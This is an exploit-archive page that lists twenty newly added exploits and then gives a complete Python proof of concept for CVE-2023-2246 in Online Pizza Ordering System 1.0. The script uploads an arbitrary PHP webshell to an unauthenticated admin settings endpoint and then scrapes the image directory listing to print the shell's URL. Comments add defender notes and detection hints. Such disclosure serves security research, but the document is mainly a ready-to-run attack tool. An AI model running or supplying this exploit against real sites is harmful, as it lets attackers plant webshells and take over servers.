
20 changes to exploits/shellcodes/ghdb Codigo Markdown Editor v1.0.1 (Electron) - Remote Code Execution Cmaps v8.0 - SQL injection EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and Path Traversal) File Thingie 2.5.7 - Remote Code Execution (RCE) Intern Record System v1.0 - SQL Injection (Unauthenticated) Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls Jedox 2020.2.5 - Remote Code Execution via Configurable Storage Path Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module Jedox 2022.4.2 - Code Execution via RPC Interfaces Jedox 2022.4.2 - Disclosure of Database Credentials via Connection Checks Jedox 2022.4.2 - Remote Code Execution via Directory Traversal KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE) Online Pizza Ordering System v1.0 - Unauthenticated File Upload pluck v4.7.18 - Stored Cross-Site Scripting (XSS) Simple Task Managing System v1.0 - SQL Injection (Unauthenticated) Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE) Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS) Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)
# Exploit Title: Online Pizza Ordering System 1.0 - Unauthenticated File Upload
# Date: 03/05/2023
# Exploit Author: URGAN
# Vendor Homepage: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-opos.zip
# Version: v1.0
# Tested on: LAMP Fedora Server 27 (Twenty Seven) Apache/2.4.34 (Fedora) 10.2.19-MariaDB PHP 7.1.23
# CVE: CVE-2023-2246
#!/usr/bin/env python3
# coding: utf-8
import os
import requests
import argparse
from bs4 import BeautifulSoup
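# Flow of this proof of concept: POST a local file to the settings endpoint
# without any session or credentials, then read the /assets/img/ listing to
# locate the stored copy.
#
# Defender notes, limited to what the requests below show:
#   * /admin/ajax.php?action=save_settings is reached with no cookie or token,
#     and the multipart field 'img' is sent as application/octet-stream.
#   * The stored file is looked up by name suffix under the web-served
#     /assets/img/ directory, so the original file name (and extension)
#     evidently survives the upload.
#   * The lookup parses <a> tags from /assets/img/, i.e. it relies on the web
#     server returning a directory index for that path.
# Controls to verify on an affected install: require an authenticated admin
# session for the action, allow-list image types by content and extension,
# keep uploads where the server will not execute scripts, and disable
# directory indexing. For detection, look for POSTs to the save_settings
# action that carry no session and for non-image files appearing in assets/img.

# Upper bound (seconds) for each HTTP call so an unresponsive host cannot hang
# the script indefinitely.
REQUEST_TIMEOUT = 30

# command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', type=str, help='URL with http://')
parser.add_argument('-p', '--payload', type=str, help='PHP webshell')
args = parser.parse_args()

# Ask only for the values that were not given, so an argument supplied on the
# command line is not silently overwritten by a second prompt.
if not args.url:
    args.url = input('Enter URL with http://: ')
if not args.payload:
    args.payload = input('Enter file path PHP webshell: ')

# URL variables
url = args.url + '/admin/ajax.php?action=save_settings'
img_url = args.url + '/assets/img/'

filename = os.path.basename(args.payload)

# Send the POST request; the context manager closes the local file handle
# whether or not the request succeeds.
with open(args.payload, 'rb') as upload_fh:
    files = [
        ('img', (filename, upload_fh, 'application/octet-stream')),
    ]
    resp_upl = requests.post(url, files=files, timeout=REQUEST_TIMEOUT)

# HTTP 200 only shows that the endpoint answered; the directory-listing check
# further down is what confirms that a file was actually stored.
status_code = resp_upl.status_code
if status_code == 200:
    print('[+] File uploaded')
else:
    print(f'[-] Error {status_code}: {resp_upl.text}')
    raise SystemExit(f'[-] Script stopped due to error {status_code}.')

# Fetch the image directory and parse the returned HTML
resp_find = requests.get(img_url, timeout=REQUEST_TIMEOUT)
soup = BeautifulSoup(resp_find.text, 'html.parser')

# All <a> tags on the page
links = soup.find_all('a')

# Full URLs of listing entries whose name ends with the uploaded file name
found_files = []
for link in links:
    file_upl = link.get('href')
    if not file_upl:
        # Anchors without an href return None; skip them instead of crashing.
        continue
    if file_upl.endswith(filename):
        print('[+] Uploaded file found:', file_upl)
        found_files.append(img_url + file_upl)

# Report the result of the lookup
if found_files:
    print('[+] Full URL of your file:')
    for file_url in found_files:
        print('[+] ' + file_url)
else:
    print('[-] File not found')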